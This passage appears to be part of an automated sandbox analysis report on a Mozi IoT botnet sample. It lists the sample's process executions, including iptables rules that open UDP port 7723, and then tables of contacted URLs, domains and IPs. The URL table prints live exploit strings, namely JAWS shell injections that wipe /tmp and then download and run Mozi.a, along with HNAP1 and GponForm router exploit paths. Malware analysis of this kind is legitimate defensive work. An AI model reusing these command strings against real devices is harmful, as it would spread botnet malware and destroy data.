iptables -I INPUT -p udp --dport 7723 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-checkreports
/usr/bin/python3 /usr/share/apport/apport-checkreports --system
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
 clean
There are 155 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://%s:%d/bin.sh;chmod
unknown
 malicious
http://146.158.12.4:80/HNAP1/
146.158.12.4
 malicious
http://217.182.243.67:80/HNAP1/
217.182.243.67
 malicious
http://99.192.234.217:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
99.192.234.217
 malicious
http://166.88.243.237:80/HNAP1/
166.88.243.237
 malicious
http://13.226.101.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
13.226.101.83
 malicious
http://%s:%d/bin.sh
unknown
 malicious
http://154.201.250.66:80/HNAP1/
154.201.250.66
 malicious
http://133.137.248.191:80/HNAP1/
133.137.248.191
 malicious
http://157.245.223.131:80/HNAP1/
157.245.223.131
 malicious
http://18.228.54.139:80/HNAP1/
18.228.54.139
 malicious
http://81.7.8.12:80/HNAP1/
81.7.8.12
 malicious
http://127.0.0.1:80/GponForm/diag_Form?images/
3.22.215.251
 malicious
http://45.65.120.55:80/HNAP1/
45.65.120.55
 malicious
http://127.0.0.1:8080/GponForm/diag_Form?images/
175.234.128.97
 malicious
http://127.0.0.1:5555/UD/act?1
146.184.165.4
 malicious
http://23.217.112.105:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
23.217.112.105
 malicious
http://23.40.37.31:80/HNAP1/
23.40.37.31
 malicious
http://185.29.123.11:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
185.29.123.11
 malicious
http://23.76.236.93:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
23.76.236.93
 malicious
http://154.90.79.101:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
154.90.79.101
 malicious
http://79.171.18.106:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
79.171.18.106
 malicious
http://23.207.67.88:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
23.207.67.88
 malicious
http://pastebin.ca)
unknown
 clean
http://%s:%d/Mozi.a;chmod
unknown
 clean
http://%s:%d/Mozi.m;$
unknown
 clean
http://schemas.xmlsoap.org/soap/envelope/
unknown
 clean
http://168.184.43.22:37215/ctrlt/DeviceUpgrade_1
168.184.43.22
 clean
http://www.pastebin.ca/upload.php
unknown
 clean
http://%s:%d/Mozi.m
unknown
 clean
http://www.alsa-project.org/cardinfo-db/
unknown
 clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
unknown
 clean
http://www.alsa-project.org/alsa-info.sh
unknown
 clean
http://%s:%d/Mozi.m;
unknown
 clean
http://%s:%d/Mozi.a;sh$
unknown
 clean
http://www.pastebin.ca.
unknown
 clean
http://35.244.243.215:80/HNAP1/
35.244.243.215
 clean
http://schemas.xmlsoap.org/soap/encoding/
unknown
 clean
http://127.0.0.1
unknown
 clean
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
unknown
 clean
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
unknown
 clean
http://www.alsa-project.org
unknown
 clean
http://127.0.0.1sendcmd
unknown
 clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
unknown
 clean
http://ipinfo.io/ip
unknown
 clean
http://%s:%d/Mozi.m;/tmp/Mozi.m
unknown
 clean
http://www.pastebin.ca
unknown
 clean
http://purenetworks.com/HNAP1/
unknown
 clean
http://www.alsa-project.org.
unknown
 clean
http://HTTP/1.1
unknown
 clean
http://schemas.xmlsoap.org/soap/envelope//
unknown
 clean
There are 41 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dht.transmissionbt.com
87.98.162.88
 clean
bttracker.acc.umu.se
130.239.18.159
 clean
router.bittorrent.com
67.215.246.10
 clean
router.utorrent.com
82.221.103.244
 clean
bttracker.debian.org
unknown
 clean

IPs

IP
Domain
Country
Malicious
91.57.107.2
unknown
Germany
malicious
179.67.135.130
unknown
Brazil
clean
219.215.91.164
unknown
Japan
clean
81.165.231.66
unknown
Belgium
clean
113.189.251.248
unknown
Viet Nam
clean
141.33.224.95
unknown
Germany
clean
33.59.152.55
unknown
United States
clean
131.194.232.220
unknown
United States
clean
177.97.224.43
unknown
Brazil
clean
105.23.11.84
unknown
Mauritius
clean
50.18.249.52
unknown
United States
clean
9.119.216.229
unknown
United States
clean
98.117.217.106
unknown
United States
clean
181.82.14.167
unknown
Argentina
clean
37.218.12.173
unknown
Spain
clean
167.116.31.50
unknown
Uruguay
clean
174.166.171.113
unknown
United States
clean
175.59.180.182
unknown
China
clean
20.219.183.3
unknown
United States
clean
115.145.240.169
unknown
Korea Republic of
clean
129.61.62.75
unknown
United States
clean
31.246.254.22
unknown
Germany
clean
44.179.175.67
unknown
United States
clean
135.235.118.101
unknown
United States
clean
31.135.20.186
unknown
Poland
clean
129.13.128.214
unknown
Germany
clean
4.147.62.142
unknown
United States
clean
117.196.107.209
unknown
India
clean
85.140.136.230
unknown
Russian Federation
clean
165.81.92.196
unknown
United States
clean
194.174.210.204
unknown
Germany
clean
181.100.16.154
unknown
Argentina
clean
31.167.14.125
unknown
Saudi Arabia
clean
169.208.248.210
unknown
Korea Republic of
clean
120.98.233.8
unknown
Taiwan; Republic of China (ROC)
clean
44.9.1.20
unknown
United States
clean
187.212.113.5
unknown
Mexico
clean
189.52.247.3
unknown
Brazil
clean
126.76.20.8
unknown
Japan
clean
117.213.41.118
unknown
India
clean
58.189.27.210
unknown
Japan
clean
114.36.89.87
unknown
Taiwan; Republic of China (ROC)
clean
211.169.167.142
unknown
Korea Republic of
clean
221.34.98.191
unknown
Japan
clean
217.211.238.79
unknown
Sweden
clean
101.197.152.207
unknown
China
clean
85.65.154.68
unknown
Israel
clean
181.20.57.55
unknown
Argentina
clean
172.92.207.39
unknown
United States
clean
134.125.107.194
unknown
United States
clean
219.15.149.67
unknown
Japan
clean
65.173.118.23
unknown
United States
clean
61.231.92.160
unknown
Taiwan; Republic of China (ROC)
clean
211.18.19.160
unknown
Japan
clean
132.204.24.45
unknown
Canada
clean
1.207.152.148
unknown
China
clean
219.47.162.234
unknown
Japan
clean
3.146.148.144
unknown
United States
clean
163.246.109.119
unknown
United States
clean
135.233.240.19
unknown
United States
clean
8.195.49.95
unknown
United States
clean
178.175.121.49
unknown
Montenegro
clean
49.0.203.86
unknown
Mongolia
clean
153.157.9.172
unknown
Japan
clean
172.42.40.243
unknown
United States
clean
157.14.182.109
unknown
Japan
clean
50.10.218.224
unknown
United States
clean
157.46.152.22
unknown
India
clean
13.219.81.91
unknown
United States
clean
130.68.74.157
unknown
United States
clean
74.18.244.100
unknown
United States
clean
207.67.91.44
unknown
United States
clean
110.192.131.42
unknown
China
clean
100.182.99.144
unknown
United States
clean
94.31.145.150
unknown
Russian Federation
clean
222.48.163.26
unknown
China
clean
16.98.151.230
unknown
United States
clean
9.20.231.34
unknown
United States
clean
159.0.138.11
unknown
Saudi Arabia
clean
89.61.117.218
unknown
Germany
clean
131.30.249.212
unknown
United States
clean
208.228.127.61
unknown
United States
clean
114.182.18.144
unknown
Japan
clean
196.90.229.151
unknown
Morocco
clean
218.231.43.124
unknown
Japan
clean
198.94.113.247
unknown
United States
clean
117.151.233.14
unknown
China
clean
43.245.138.132
unknown
India
clean
170.169.8.221
unknown
Mexico
clean
147.22.206.236
unknown
United States
clean
119.197.149.98
unknown
Korea Republic of
clean
157.245.145.71
unknown
United States
clean
114.100.97.125
unknown
China
clean
199.125.24.246
unknown
United States
clean
105.162.120.29
unknown
Kenya
clean
86.104.41.235
unknown
Iran (ISLAMIC Republic Of)
clean
57.211.14.243
unknown
Belgium
clean
175.159.188.41
unknown
Hong Kong
clean
138.40.6.32
unknown
United Kingdom
clean
139.130.197.234
unknown
Australia
clean
There are 90 hidden IPs, click here to show them.